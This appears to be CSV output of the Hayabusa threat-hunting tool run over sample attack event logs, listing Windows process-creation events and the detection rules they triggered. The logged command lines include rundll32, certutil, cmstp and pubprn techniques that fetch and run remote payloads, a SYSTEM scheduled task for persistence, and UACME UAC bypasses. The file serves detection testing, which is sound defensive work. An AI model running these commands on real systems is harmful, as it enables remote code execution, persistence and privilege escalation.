Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication 
"";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in 
CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
/C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 
+09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 
+09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 
script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 34 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx 